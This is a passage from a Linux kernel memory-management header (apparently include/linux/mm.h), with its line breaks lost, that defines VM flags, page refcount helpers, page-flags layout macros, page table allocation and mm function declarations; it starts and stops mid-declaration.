VM_STACK_DEFAULT_FLAGS | VM_ACCOUNT) #endif #define VM_READHINTMASK (VM_SEQ_READ | VM_RAND_READ) #define VM_ClearReadHint(v) (v)->vm_flags &= ~VM_READHINTMASK #define VM_NormalReadHint(v) (!((v)->vm_flags & VM_READHINTMASK)) #define VM_SequentialReadHint(v) ((v)->vm_flags & VM_SEQ_READ) #define VM_RandomReadHint(v) ((v)->vm_flags & VM_RAND_READ) /* * special vmas that are non-mergable, non-mlock()able */ #define VM_SPECIAL (VM_IO | VM_DONTEXPAND | VM_RESERVED | VM_PFNMAP) /* * mapping from the currently active vm_flags protection bits (the * low four bits) to a page protection mask.. */ extern pgprot_t protection_map[16]; #define FAULT_FLAG_WRITE 0x01 /* Fault was a write access */ #define FAULT_FLAG_NONLINEAR 0x02 /* Fault was via a nonlinear mapping */ #define FAULT_FLAG_MKWRITE 0x04 /* Fault was mkwrite of existing pte */ /* * This interface is used by x86 PAT code to identify a pfn mapping that is * linear over entire vma. This is to optimize PAT code that deals with * marking the physical region with a particular prot. This is not for generic * mm use. Note also that this check will not work if the pfn mapping is * linear for a vma starting at physical address 0. In which case PAT code * falls back to slow path of reserving physical range page by page. */ static inline int is_linear_pfn_mapping(struct vm_area_struct *vma) { return (vma->vm_flags & VM_PFN_AT_MMAP); } static inline int is_pfn_mapping(struct vm_area_struct *vma) { return (vma->vm_flags & VM_PFNMAP); } /* * vm_fault is filled by the the pagefault handler and passed to the vma's * ->fault function. The vma's ->fault is responsible for returning a bitmask * of VM_FAULT_xxx flags that give details about how the fault was handled. * * pgoff should be used in favour of virtual_address, if possible. If pgoff * is used, one may set VM_CAN_NONLINEAR in the vma->vm_flags to get nonlinear * mapping support. */ struct vm_fault { unsigned int flags; /* FAULT_FLAG_xxx flags */ pgoff_t pgoff; /* Logical page offset based on vma */ void __user *virtual_address; /* Faulting virtual address */ struct page *page; /* ->fault handlers should return a * page here, unless VM_FAULT_NOPAGE * is set (which is also implied by * VM_FAULT_ERROR). */ }; /* * These are the virtual MM functions - opening of an area, closing and * unmapping it (needed to keep files on disk up-to-date etc), pointer * to the functions called when a no-page or a wp-page exception occurs. */ struct vm_operations_struct { void (*open)(struct vm_area_struct * area); void (*close)(struct vm_area_struct * area); int (*fault)(struct vm_area_struct *vma, struct vm_fault *vmf); /* notification that a previously read-only page is about to become * writable, if an error is returned it will cause a SIGBUS */ int (*page_mkwrite)(struct vm_area_struct *vma, struct vm_fault *vmf); /* called by access_process_vm when get_user_pages() fails, typically * for use by special VMAs that can switch between memory and hardware */ int (*access)(struct vm_area_struct *vma, unsigned long addr, void *buf, int len, int write); #ifdef CONFIG_NUMA /* * set_policy() op must add a reference to any non-NULL @new mempolicy * to hold the policy upon return. Caller should pass NULL @new to * remove a policy and fall back to surrounding context--i.e. do not * install a MPOL_DEFAULT policy, nor the task or system default * mempolicy. */ int (*set_policy)(struct vm_area_struct *vma, struct mempolicy *new); /* * get_policy() op must add reference [mpol_get()] to any policy at * (vma,addr) marked as MPOL_SHARED. The shared policy infrastructure * in mm/mempolicy.c will do this automatically. * get_policy() must NOT add a ref if the policy at (vma,addr) is not * marked as MPOL_SHARED. vma policies are protected by the mmap_sem. * If no [shared/vma] mempolicy exists at the addr, get_policy() op * must return NULL--i.e., do not "fallback" to task or system default * policy. */ struct mempolicy *(*get_policy)(struct vm_area_struct *vma, unsigned long addr); int (*migrate)(struct vm_area_struct *vma, const nodemask_t *from, const nodemask_t *to, unsigned long flags); #endif }; struct mmu_gather; struct inode; #define page_private(page) ((page)->private) #define set_page_private(page, v) ((page)->private = (v)) /* * FIXME: take this include out, include page-flags.h in * files which need it (119 of them) */ #include <linux/page-flags.h> /* * Methods to modify the page usage count. * * What counts for a page usage: * - cache mapping (page->mapping) * - private data (page->private) * - page mapped in a task's page tables, each mapping * is counted separately * * Also, many kernel routines increase the page count before a critical * routine so they can be sure the page doesn't go away from under them. */ /* * Drop a ref, return true if the refcount fell to zero (the page has no users) */ static inline int put_page_testzero(struct page *page) { VM_BUG_ON(atomic_read(&page->_count) == 0); return atomic_dec_and_test(&page->_count); } /* * Try to grab a ref unless the page has a refcount of zero, return false if * that is the case. */ static inline int get_page_unless_zero(struct page *page) { return atomic_inc_not_zero(&page->_count); } /* Support for virtually mapped pages */ struct page *vmalloc_to_page(const void *addr); unsigned long vmalloc_to_pfn(const void *addr); /* * Determine if an address is within the vmalloc range * * On nommu, vmalloc/vfree wrap through kmalloc/kfree directly, so there * is no special casing required. */ static inline int is_vmalloc_addr(const void *x) { #ifdef CONFIG_MMU unsigned long addr = (unsigned long)x; return addr >= VMALLOC_START && addr < VMALLOC_END; #else return 0; #endif } #ifdef CONFIG_MMU extern int is_vmalloc_or_module_addr(const void *x); #else static inline int is_vmalloc_or_module_addr(const void *x) { return 0; } #endif static inline struct page *compound_head(struct page *page) { if (unlikely(PageTail(page))) return page->first_page; return page; } static inline int page_count(struct page *page) { return atomic_read(&compound_head(page)->_count); } static inline void get_page(struct page *page) { page = compound_head(page); VM_BUG_ON(atomic_read(&page->_count) == 0); atomic_inc(&page->_count); } static inline struct page *virt_to_head_page(const void *x) { struct page *page = virt_to_page(x); return compound_head(page); } /* * Setup the page count before being freed into the page allocator for * the first time (boot or memory hotplug) */ static inline void init_page_count(struct page *page) { atomic_set(&page->_count, 1); } void put_page(struct page *page); void put_pages_list(struct list_head *pages); void split_page(struct page *page, unsigned int order); /* * Compound pages have a destructor function. Provide a * prototype for that function and accessor functions. * These are _only_ valid on the head of a PG_compound page. */ typedef void compound_page_dtor(struct page *); static inline void set_compound_page_dtor(struct page *page, compound_page_dtor *dtor) { page[1].lru.next = (void *)dtor; } static inline compound_page_dtor *get_compound_page_dtor(struct page *page) { return (compound_page_dtor *)page[1].lru.next; } static inline int compound_order(struct page *page) { if (!PageHead(page)) return 0; return (unsigned long)page[1].lru.prev; } static inline void set_compound_order(struct page *page, unsigned long order) { page[1].lru.prev = (void *)order; } /* * Multiple processes may "see" the same page. E.g. for untouched * mappings of /dev/null, all processes see the same page full of * zeroes, and text pages of executables and shared libraries have * only one copy in memory, at most, normally. * * For the non-reserved pages, page_count(page) denotes a reference count. * page_count() == 0 means the page is free. page->lru is then used for * freelist management in the buddy allocator. * page_count() > 0 means the page has been allocated. * * Pages are allocated by the slab allocator in order to provide memory * to kmalloc and kmem_cache_alloc. In this case, the management of the * page, and the fields in 'struct page' are the responsibility of mm/slab.c * unless a particular usage is carefully commented. (the responsibility of * freeing the kmalloc memory is the caller's, of course). * * A page may be used by anyone else who does a __get_free_page(). * In this case, page_count still tracks the references, and should only * be used through the normal accessor functions. The top bits of page->flags * and page->virtual store page management information, but all other fields * are unused and could be used privately, carefully. The management of this * page is the responsibility of the one who allocated it, and those who have * subsequently been given references to it. * * The other pages (we may call them "pagecache pages") are completely * managed by the Linux memory manager: I/O, buffers, swapping etc. * The following discussion applies only to them. * * A pagecache page contains an opaque `private' member, which belongs to the * page's address_space. Usually, this is the address of a circular list of * the page's disk buffers. PG_private must be set to tell the VM to call * into the filesystem to release these pages. * * A page may belong to an inode's memory mapping. In this case, page->mapping * is the pointer to the inode, and page->index is the file offset of the page, * in units of PAGE_CACHE_SIZE. * * If pagecache pages are not associated with an inode, they are said to be * anonymous pages. These may become associated with the swapcache, and in that * case PG_swapcache is set, and page->private is an offset into the swapcache. * * In either case (swapcache or inode backed), the pagecache itself holds one * reference to the page. Setting PG_private should also increment the * refcount. The each user mapping also has a reference to the page. * * The pagecache pages are stored in a per-mapping radix tree, which is * rooted at mapping->page_tree, and indexed by offset. * Where 2.4 and early 2.6 kernels kept dirty/clean pages in per-address_space * lists, we instead now tag pages as dirty/writeback in the radix tree. * * All pagecache pages may be subject to I/O: * - inode pages may need to be read from disk, * - inode pages which have been modified and are MAP_SHARED may need * to be written back to the inode on disk, * - anonymous pages (including MAP_PRIVATE file mappings) which have been * modified may need to be swapped out to swap space and (later) to be read * back into memory. */ /* * The zone field is never updated after free_area_init_core() * sets it, so none of the operations on it need to be atomic. */ /* * page->flags layout: * * There are three possibilities for how page->flags get * laid out. The first is for the normal case, without * sparsemem. The second is for sparsemem when there is * plenty of space for node and section. The last is when * we have run out of space and have to fall back to an * alternate (slower) way of determining the node. * * No sparsemem or sparsemem vmemmap: | NODE | ZONE | ... | FLAGS | * classic sparse with space for node:| SECTION | NODE | ZONE | ... | FLAGS | * classic sparse no space for node: | SECTION | ZONE | ... | FLAGS | */ #if defined(CONFIG_SPARSEMEM) && !defined(CONFIG_SPARSEMEM_VMEMMAP) #define SECTIONS_WIDTH SECTIONS_SHIFT #else #define SECTIONS_WIDTH 0 #endif #define ZONES_WIDTH ZONES_SHIFT #if SECTIONS_WIDTH+ZONES_WIDTH+NODES_SHIFT <= BITS_PER_LONG - NR_PAGEFLAGS #define NODES_WIDTH NODES_SHIFT #else #ifdef CONFIG_SPARSEMEM_VMEMMAP #error "Vmemmap: No space for nodes field in page flags" #endif #define NODES_WIDTH 0 #endif /* Page flags: | [SECTION] | [NODE] | ZONE | ... | FLAGS | */ #define SECTIONS_PGOFF ((sizeof(unsigned long)*8) - SECTIONS_WIDTH) #define NODES_PGOFF (SECTIONS_PGOFF - NODES_WIDTH) #define ZONES_PGOFF (NODES_PGOFF - ZONES_WIDTH) /* * We are going to use the flags for the page to node mapping if its in * there. This includes the case where there is no node, so it is implicit. */ #if !(NODES_WIDTH > 0 || NODES_SHIFT == 0) #define NODE_NOT_IN_PAGE_FLAGS #endif #ifndef PFN_SECTION_SHIFT #define PFN_SECTION_SHIFT 0 #endif /* * Define the bit shifts to access each section. For non-existant * sections we define the shift as 0; that plus a 0 mask ensures * the compiler will optimise away reference to them. */ #define SECTIONS_PGSHIFT (SECTIONS_PGOFF * (SECTIONS_WIDTH != 0)) #define NODES_PGSHIFT (NODES_PGOFF * (NODES_WIDTH != 0)) #define ZONES_PGSHIFT (ZONES_PGOFF * (ZONES_WIDTH != 0)) /* NODE:ZONE or SECTION:ZONE is used to ID a zone for the buddy allcator */ #ifdef NODE_NOT_IN_PAGEFLAGS #define ZONEID_SHIFT (SECTIONS_SHIFT + ZONES_SHIFT) #define ZONEID_PGOFF ((SECTIONS_PGOFF < ZONES_PGOFF)? \ SECTIONS_PGOFF : ZONES_PGOFF) #else #define ZONEID_SHIFT (NODES_SHIFT + ZONES_SHIFT) #define ZONEID_PGOFF ((NODES_PGOFF < ZONES_PGOFF)? \ NODES_PGOFF : ZONES_PGOFF) #endif #define ZONEID_PGSHIFT (ZONEID_PGOFF * (ZONEID_SHIFT != 0)) #if SECTIONS_WIDTH+NODES_WIDTH+ZONES_WIDTH > BITS_PER_LONG - NR_PAGEFLAGS #error SECTIONS_WIDTH+NODES_WIDTH+ZONES_WIDTH > BITS_PER_LONG - NR_PAGEFLAGS #endif #define ZONES_MASK ((1UL << ZONES_WIDTH) - 1) #define NODES_MASK ((1UL << NODES_WIDTH) - 1) #define SECTIONS_MASK ((1UL << SECTIONS_WIDTH) - 1) #define ZONEID_MASK ((1UL << ZONEID_SHIFT) - 1) static inline enum zone_type page_zonenum(struct page *page) { return (page->flags >> ZONES_PGSHIFT) & ZONES_MASK; } /* * The identification function is only used by the buddy allocator for * determining if two pages could be buddies. We are not really * identifying a zone since we could be using a the section number * id if we have not node id available in page flags. * We guarantee only that it will return the same value for two * combinable pages in a zone. */ static inline int page_zone_id(struct page *page) { return (page->flags >> ZONEID_PGSHIFT) & ZONEID_MASK; } static inline int zone_to_nid(struct zone *zone) { #ifdef CONFIG_NUMA return zone->node; #else return 0; #endif } #ifdef NODE_NOT_IN_PAGE_FLAGS extern int page_to_nid(struct page *page); #else static inline int page_to_nid(struct page *page) { return (page->flags >> NODES_PGSHIFT) & NODES_MASK; } #endif static inline struct zone *page_zone(struct page *page) { return &NODE_DATA(page_to_nid(page))->node_zones[page_zonenum(page)]; } #if defined(CONFIG_SPARSEMEM) && !defined(CONFIG_SPARSEMEM_VMEMMAP) static inline unsigned long page_to_section(struct page *page) { return (page->flags >> SECTIONS_PGSHIFT) & SECTIONS_MASK; } #endif static inline void set_page_zone(struct page *page, enum zone_type zone) { page->flags &= ~(ZONES_MASK << ZONES_PGSHIFT); page->flags |= (zone & ZONES_MASK) << ZONES_PGSHIFT; } static inline void set_page_node(struct page *page, unsigned long node) { page->flags &= ~(NODES_MASK << NODES_PGSHIFT); page->flags |= (node & NODES_MASK) << NODES_PGSHIFT; } static inline void set_page_section(struct page *page, unsigned long section) { page->flags &= ~(SECTIONS_MASK << SECTIONS_PGSHIFT); page->flags |= (section & SECTIONS_MASK) << SECTIONS_PGSHIFT; } static inline void set_page_links(struct page *page, enum zone_type zone, unsigned long node, unsigned long pfn) { set_page_zone(page, zone); set_page_node(page, node); set_page_section(page, pfn_to_section_nr(pfn)); } /* * Some inline functions in vmstat.h depend on page_zone() */ #include <linux/vmstat.h> static __always_inline void *lowmem_page_address(struct page *page) { return __va(page_to_pfn(page) << PAGE_SHIFT); } #if defined(CONFIG_HIGHMEM) && !defined(WANT_PAGE_VIRTUAL) #define HASHED_PAGE_VIRTUAL #endif #if defined(WANT_PAGE_VIRTUAL) #define page_address(page) ((page)->virtual) #define set_page_address(page, address) \ do { \ (page)->virtual = (address); \ } while(0) #define page_address_init() do { } while(0) #endif #if defined(HASHED_PAGE_VIRTUAL) void *page_address(struct page *page); void set_page_address(struct page *page, void *virtual); void page_address_init(void); #endif #if !defined(HASHED_PAGE_VIRTUAL) && !defined(WANT_PAGE_VIRTUAL) #define page_address(page) lowmem_page_address(page) #define set_page_address(page, address) do { } while(0) #define page_address_init() do { } while(0) #endif /* * On an anonymous page mapped into a user virtual memory area, * page->mapping points to its anon_vma, not to a struct address_space; * with the PAGE_MAPPING_ANON bit set to distinguish it. * * Please note that, confusingly, "page_mapping" refers to the inode * address_space which maps the page from disk; whereas "page_mapped" * refers to user virtual address space into which the page is mapped. */ #define PAGE_MAPPING_ANON 1 extern struct address_space swapper_space; static inline struct address_space *page_mapping(struct page *page) { struct address_space *mapping = page->mapping; VM_BUG_ON(PageSlab(page)); #ifdef CONFIG_SWAP if (unlikely(PageSwapCache(page))) mapping = &swapper_space; else #endif if (unlikely((unsigned long)mapping & PAGE_MAPPING_ANON)) mapping = NULL; return mapping; } static inline int PageAnon(struct page *page) { return ((unsigned long)page->mapping & PAGE_MAPPING_ANON) != 0; } /* * Return the pagecache index of the passed page. Regular pagecache pages * use ->index whereas swapcache pages use ->private */ static inline pgoff_t page_index(struct page *page) { if (unlikely(PageSwapCache(page))) return page_private(page); return page->index; } /* * The atomic page->_mapcount, like _count, starts from -1: * so that transitions both from it and to it can be tracked, * using atomic_inc_and_test and atomic_add_negative(-1). */ static inline void reset_page_mapcount(struct page *page) { atomic_set(&(page)->_mapcount, -1); } static inline int page_mapcount(struct page *page) { return atomic_read(&(page)->_mapcount) + 1; } /* * Return true if this page is mapped into pagetables. */ static inline int page_mapped(struct page *page) { return atomic_read(&(page)->_mapcount) >= 0; } /* * Different kinds of faults, as returned by handle_mm_fault(). * Used to decide whether a process gets delivered SIGBUS or * just gets major/minor fault counters bumped up. */ #define VM_FAULT_MINOR 0 /* For backwards compat. Remove me quickly. */ #define VM_FAULT_OOM 0x0001 #define VM_FAULT_SIGBUS 0x0002 #define VM_FAULT_MAJOR 0x0004 #define VM_FAULT_WRITE 0x0008 /* Special case for get_user_pages */ #define VM_FAULT_HWPOISON 0x0010 /* Hit poisoned page */ #define VM_FAULT_NOPAGE 0x0100 /* ->fault installed the pte, not return page */ #define VM_FAULT_LOCKED 0x0200 /* ->fault locked the returned page */ #define VM_FAULT_ERROR (VM_FAULT_OOM | VM_FAULT_SIGBUS | VM_FAULT_HWPOISON) /* * Can be called by the pagefault handler when it gets a VM_FAULT_OOM. */ extern void pagefault_out_of_memory(void); #define offset_in_page(p) ((unsigned long)(p) & ~PAGE_MASK) extern void show_free_areas(void); int shmem_lock(struct file *file, int lock, struct user_struct *user); struct file *shmem_file_setup(const char *name, loff_t size, unsigned long flags); int shmem_zero_setup(struct vm_area_struct *); #ifndef CONFIG_MMU extern unsigned long shmem_get_unmapped_area(struct file *file, unsigned long addr, unsigned long len, unsigned long pgoff, unsigned long flags); #endif extern int can_do_mlock(void); extern int user_shm_lock(size_t, struct user_struct *); extern void user_shm_unlock(size_t, struct user_struct *); /* * Parameter block passed down to zap_pte_range in exceptional cases. */ struct zap_details { struct vm_area_struct *nonlinear_vma; /* Check page->index if set */ struct address_space *check_mapping; /* Check page->mapping if set */ pgoff_t first_index; /* Lowest page->index to unmap */ pgoff_t last_index; /* Highest page->index to unmap */ spinlock_t *i_mmap_lock; /* For unmap_mapping_range: */ unsigned long truncate_count; /* Compare vm_truncate_count */ }; struct page *vm_normal_page(struct vm_area_struct *vma, unsigned long addr, pte_t pte); int zap_vma_ptes(struct vm_area_struct *vma, unsigned long address, unsigned long size); unsigned long zap_page_range(struct vm_area_struct *vma, unsigned long address, unsigned long size, struct zap_details *); unsigned long unmap_vmas(struct mmu_gather **tlb, struct vm_area_struct *start_vma, unsigned long start_addr, unsigned long end_addr, unsigned long *nr_accounted, struct zap_details *); /** * mm_walk - callbacks for walk_page_range * @pgd_entry: if set, called for each non-empty PGD (top-level) entry * @pud_entry: if set, called for each non-empty PUD (2nd-level) entry * @pmd_entry: if set, called for each non-empty PMD (3rd-level) entry * @pte_entry: if set, called for each non-empty PTE (4th-level) entry * @pte_hole: if set, called for each hole at all levels * * (see walk_page_range for more details) */ struct mm_walk { int (*pgd_entry)(pgd_t *, unsigned long, unsigned long, struct mm_walk *); int (*pud_entry)(pud_t *, unsigned long, unsigned long, struct mm_walk *); int (*pmd_entry)(pmd_t *, unsigned long, unsigned long, struct mm_walk *); int (*pte_entry)(pte_t *, unsigned long, unsigned long, struct mm_walk *); int (*pte_hole)(unsigned long, unsigned long, struct mm_walk *); struct mm_struct *mm; void *private; }; int walk_page_range(unsigned long addr, unsigned long end, struct mm_walk *walk); void free_pgd_range(struct mmu_gather *tlb, unsigned long addr, unsigned long end, unsigned long floor, unsigned long ceiling); int copy_page_range(struct mm_struct *dst, struct mm_struct *src, struct vm_area_struct *vma); void unmap_mapping_range(struct address_space *mapping, loff_t const holebegin, loff_t const holelen, int even_cows); int follow_pfn(struct vm_area_struct *vma, unsigned long address, unsigned long *pfn); int follow_phys(struct vm_area_struct *vma, unsigned long address, unsigned int flags, unsigned long *prot, resource_size_t *phys); int generic_access_phys(struct vm_area_struct *vma, unsigned long addr, void *buf, int len, int write); static inline void unmap_shared_mapping_range(struct address_space *mapping, loff_t const holebegin, loff_t const holelen) { unmap_mapping_range(mapping, holebegin, holelen, 0); } extern void truncate_pagecache(struct inode *inode, loff_t old, loff_t new); extern int vmtruncate(struct inode *inode, loff_t offset); extern int vmtruncate_range(struct inode *inode, loff_t offset, loff_t end); int truncate_inode_page(struct address_space *mapping, struct page *page); int generic_error_remove_page(struct address_space *mapping, struct page *page); int invalidate_inode_page(struct page *page); #ifdef CONFIG_MMU extern int handle_mm_fault(struct mm_struct *mm, struct vm_area_struct *vma, unsigned long address, unsigned int flags); #else static inline int handle_mm_fault(struct mm_struct *mm, struct vm_area_struct *vma, unsigned long address, unsigned int flags) { /* should never happen if there's no MMU */ BUG(); return VM_FAULT_SIGBUS; } #endif extern int make_pages_present(unsigned long addr, unsigned long end); extern int access_process_vm(struct task_struct *tsk, unsigned long addr, void *buf, int len, int write); int get_user_pages(struct task_struct *tsk, struct mm_struct *mm, unsigned long start, int nr_pages, int write, int force, struct page **pages, struct vm_area_struct **vmas); int get_user_pages_fast(unsigned long start, int nr_pages, int write, struct page **pages); struct page *get_dump_page(unsigned long addr); extern int try_to_release_page(struct page * page, gfp_t gfp_mask); extern void do_invalidatepage(struct page *page, unsigned long offset); int __set_page_dirty_nobuffers(struct page *page); int __set_page_dirty_no_writeback(struct page *page); int redirty_page_for_writepage(struct writeback_control *wbc, struct page *page); void account_page_dirtied(struct page *page, struct address_space *mapping); int set_page_dirty(struct page *page); int set_page_dirty_lock(struct page *page); int clear_page_dirty_for_io(struct page *page); extern unsigned long move_page_tables(struct vm_area_struct *vma, unsigned long old_addr, struct vm_area_struct *new_vma, unsigned long new_addr, unsigned long len); extern unsigned long do_mremap(unsigned long addr, unsigned long old_len, unsigned long new_len, unsigned long flags, unsigned long new_addr); extern int mprotect_fixup(struct vm_area_struct *vma, struct vm_area_struct **pprev, unsigned long start, unsigned long end, unsigned long newflags); /* * doesn't attempt to fault and will return short. */ int __get_user_pages_fast(unsigned long start, int nr_pages, int write, struct page **pages); /* * A callback you can register to apply pressure to ageable caches. * * 'shrink' is passed a count 'nr_to_scan' and a 'gfpmask'. It should * look through the least-recently-used 'nr_to_scan' entries and * attempt to free them up. It should return the number of objects * which remain in the cache. If it returns -1, it means it cannot do * any scanning at this time (eg. there is a risk of deadlock). * * The 'gfpmask' refers to the allocation we are currently trying to * fulfil. * * Note that 'shrink' will be passed nr_to_scan == 0 when the VM is * querying the cache size, so a fastpath for that case is appropriate. */ struct shrinker { int (*shrink)(int nr_to_scan, gfp_t gfp_mask); int seeks; /* seeks to recreate an obj */ /* These are for internal use */ struct list_head list; long nr; /* objs pending delete */ }; #define DEFAULT_SEEKS 2 /* A good number if you don't know better. */ extern void register_shrinker(struct shrinker *); extern void unregister_shrinker(struct shrinker *); int vma_wants_writenotify(struct vm_area_struct *vma); extern pte_t *get_locked_pte(struct mm_struct *mm, unsigned long addr, spinlock_t **ptl); #ifdef __PAGETABLE_PUD_FOLDED static inline int __pud_alloc(struct mm_struct *mm, pgd_t *pgd, unsigned long address) { return 0; } #else int __pud_alloc(struct mm_struct *mm, pgd_t *pgd, unsigned long address); #endif #ifdef __PAGETABLE_PMD_FOLDED static inline int __pmd_alloc(struct mm_struct *mm, pud_t *pud, unsigned long address) { return 0; } #else int __pmd_alloc(struct mm_struct *mm, pud_t *pud, unsigned long address); #endif int __pte_alloc(struct mm_struct *mm, pmd_t *pmd, unsigned long address); int __pte_alloc_kernel(pmd_t *pmd, unsigned long address); /* * The following ifdef needed to get the 4level-fixup.h header to work. * Remove it when 4level-fixup.h has been removed. */ #if defined(CONFIG_MMU) && !defined(__ARCH_HAS_4LEVEL_HACK) static inline pud_t *pud_alloc(struct mm_struct *mm, pgd_t *pgd, unsigned long address) { return (unlikely(pgd_none(*pgd)) && __pud_alloc(mm, pgd, address))? NULL: pud_offset(pgd, address); } static inline pmd_t *pmd_alloc(struct mm_struct *mm, pud_t *pud, unsigned long address) { return (unlikely(pud_none(*pud)) && __pmd_alloc(mm, pud, address))? NULL: pmd_offset(pud, address); } #endif /* CONFIG_MMU && !__ARCH_HAS_4LEVEL_HACK */ #if USE_SPLIT_PTLOCKS /* * We tuck a spinlock to guard each pagetable page into its struct page, * at page->private, with BUILD_BUG_ON to make sure that this will not * overflow into the next struct page (as it might with DEBUG_SPINLOCK). * When freeing, reset page->mapping so free_pages_check won't complain. */ #define __pte_lockptr(page) &((page)->ptl) #define pte_lock_init(_page) do { \ spin_lock_init(__pte_lockptr(_page)); \ } while (0) #define pte_lock_deinit(page) ((page)->mapping = NULL) #define pte_lockptr(mm, pmd) ({(void)(mm); __pte_lockptr(pmd_page(*(pmd)));}) #else /* !USE_SPLIT_PTLOCKS */ /* * We use mm->page_table_lock to guard all pagetable pages of the mm. */ #define pte_lock_init(page) do {} while (0) #define pte_lock_deinit(page) do {} while (0) #define pte_lockptr(mm, pmd) ({(void)(pmd); &(mm)->page_table_lock;}) #endif /* USE_SPLIT_PTLOCKS */ static inline void pgtable_page_ctor(struct page *page) { pte_lock_init(page); inc_zone_page_state(page, NR_PAGETABLE); } static inline void pgtable_page_dtor(struct page *page) { pte_lock_deinit(page); dec_zone_page_state(page, NR_PAGETABLE); } #define pte_offset_map_lock(mm, pmd, address, ptlp) \ ({ \ spinlock_t *__ptl = pte_lockptr(mm, pmd); \ pte_t *__pte = pte_offset_map(pmd, address); \ *(ptlp) = __ptl; \ spin_lock(__ptl); \ __pte; \ }) #define pte_unmap_unlock(pte, ptl) do { \ spin_unlock(ptl); \ pte_unmap(pte); \ } while (0) #define pte_alloc_map(mm, pmd, address) \ ((unlikely(!pmd_present(*(pmd))) && __pte_alloc(mm, pmd, address))? \ NULL: pte_offset_map(pmd, address)) #define pte_alloc_map_lock(mm, pmd, address, ptlp) \ ((unlikely(!pmd_present(*(pmd))) && __pte_alloc(mm, pmd, address))? \ NULL: pte_offset_map_lock(mm, pmd, address, ptlp)) #define pte_alloc_kernel(pmd, address) \ ((unlikely(!pmd_present(*(pmd))) && __pte_alloc_kernel(pmd, address))? \ NULL: pte_offset_kernel(pmd, address)) extern void free_area_init(unsigned long * zones_size); extern void free_area_init_node(int nid, unsigned long * zones_size, unsigned long zone_start_pfn, unsigned long *zholes_size); #ifdef CONFIG_ARCH_POPULATES_NODE_MAP /* * With CONFIG_ARCH_POPULATES_NODE_MAP set, an architecture may initialise its * zones, allocate the backing mem_map and account for memory holes in a more * architecture independent manner. This is a substitute for creating the * zone_sizes[] and zholes_size[] arrays and passing them to * free_area_init_node() * * An architecture is expected to register range of page frames backed by * physical memory with add_active_range() before calling * free_area_init_nodes() passing in the PFN each zone ends at. At a basic * usage, an architecture is expected to do something like * * unsigned long max_zone_pfns[MAX_NR_ZONES] = {max_dma, max_normal_pfn, * max_highmem_pfn}; * for_each_valid_physical_page_range() * add_active_range(node_id, start_pfn, end_pfn) * free_area_init_nodes(max_zone_pfns); * * If the architecture guarantees that there are no holes in the ranges * registered with add_active_range(), free_bootmem_active_regions() * will call free_bootmem_node() for each registered physical page range. * Similarly sparse_memory_present_with_active_regions() calls * memory_present() for each range when SPARSEMEM is enabled. * * See mm/page_alloc.c for more information on each function exposed by * CONFIG_ARCH_POPULATES_NODE_MAP */ extern void free_area_init_nodes(unsigned long *max_zone_pfn); extern void add_active_range(unsigned int nid, unsigned long start_pfn, unsigned long end_pfn); extern void remove_active_range(unsigned int nid, unsigned long start_pfn, unsigned long end_pfn); extern void remove_all_active_ranges(void); extern unsigned long absent_pages_in_range(unsigned long start_pfn, unsigned long end_pfn); extern void get_pfn_range_for_nid(unsigned int nid, unsigned long *start_pfn, unsigned long *end_pfn); extern unsigned long find_min_pfn_with_active_regions(void); extern void free_bootmem_with_active_regions(int nid, unsigned long max_low_pfn); typedef int (*work_fn_t)(unsigned long, unsigned long, void *); extern void work_with_active_regions(int nid, work_fn_t work_fn, void *data); extern void sparse_memory_present_with_active_regions(int nid); #endif /* CONFIG_ARCH_POPULATES_NODE_MAP */ #if !defined(CONFIG_ARCH_POPULATES_NODE_MAP) && \ !defined(CONFIG_HAVE_ARCH_EARLY_PFN_TO_NID) static inline int __early_pfn_to_nid(unsigned long pfn) { return 0; } #else /* please see mm/page_alloc.c */ extern int __meminit early_pfn_to_nid(unsigned long pfn); #ifdef CONFIG_HAVE_ARCH_EARLY_PFN_TO_NID /* there is a per-arch backend function. */ extern int __meminit __early_pfn_to_nid(unsigned long pfn); #endif /* CONFIG_HAVE_ARCH_EARLY_PFN_TO_NID */ #endif extern void set_dma_reserve(unsigned long new_dma_reserve); extern void memmap_init_zone(unsigned long, int, unsigned long, unsigned long, enum memmap_context); extern void setup_per_zone_wmarks(void); extern void calculate_zone_inactive_ratio(struct zone *zone); extern void mem_init(void); extern void __init mmap_init(void); extern void show_mem(void); extern void si_meminfo(struct sysinfo * val); extern void si_meminfo_node(struct sysinfo *val, int nid); extern int after_bootmem; #ifdef CONFIG_NUMA extern void setup_per_cpu_pageset(void); #else static inline void setup_per_cpu_pageset(void) {} #endif extern void zone_pcp_update(struct zone *zone); /* nommu.c */ extern atomic_long_t mmap_pages_allocated; /* prio_tree.c */ void vma_prio_tree_add(struct vm_area_struct *, struct vm_area_struct *old); void vma_prio_tree_insert(struct vm_area_struct *, struct prio_tree_root *); void vma_prio_tree_remove(struct vm_area_struct *, struct prio_tree_root *); struct vm_area_struct *vma_prio_tree_next(struct vm_area_struct *vma, struct prio_tree_iter *iter); #define vma_prio_tree_foreach(vma, iter, root, begin, end) \ for (prio_tree_iter_init(iter, root, begin, end), vma = NULL; \ (vma = vma_prio_tree_next(vma, iter)); ) static inline void vma_nonlinear_insert(struct vm_area_struct *vma, struct list_head *list) { vma->shared.vm_set.parent = NULL; list_add_tail(&vma->shared.vm_set.list, list); } /* mmap.c */ extern int __vm_enough_memory(struct mm_struct *mm, long pages, int cap_sys_admin); extern void vma_adjust(struct vm_area_struct *vma, unsigned long start, unsigned long end, pgoff_t pgoff, struct vm_area_struct *insert); extern struct vm_area_struct *vma_merge(struct mm_struct *, struct vm_area_struct *prev, unsigned long addr, unsigned long end, unsigned long vm_flags, struct anon_vma *, struct file *, pgoff_t, struct mempolicy *); extern struct anon_vma *find_mergeable_anon_vma(struct vm_area_struct *); extern int split_vma(struct mm_struct *, struct vm_area_struct *, unsigned long addr, int new_below); extern int insert_vm_struct(struct mm_struct *, struct vm_area_struct *); extern void __vma_link_rb(struct mm_struct *, struct vm_area_struct *, struct rb_node **, struct rb_node *); extern void unlink_file_vma(struct vm_area_struct *); extern struct vm_area_struct *copy_vma(struct vm_area_struct **, unsigned long addr, unsigned long len, pgoff_t pgoff); extern void exit_mmap(struct mm_struct *); extern int mm_take_all_locks(struct mm_struct *mm); extern void mm_drop_all_locks(struct mm_struct *mm); #ifdef CONFIG_PROC_FS /* From fs/proc/base.c. callers must _not_ hold the mm's exe_file_lock */ extern void added_exe_file_vma(struct mm_struct *mm); extern void removed_exe_file_vma(struct mm_struct *mm); #else static inline void added_exe_file_vma(struct mm_struct *mm) {} static inline void removed_exe_file_vma(struct mm_struct *mm) {} #endif /* CONFIG_PROC_FS */ extern int may_expand_vm(struct mm_struct *mm, unsigned long npages); extern int 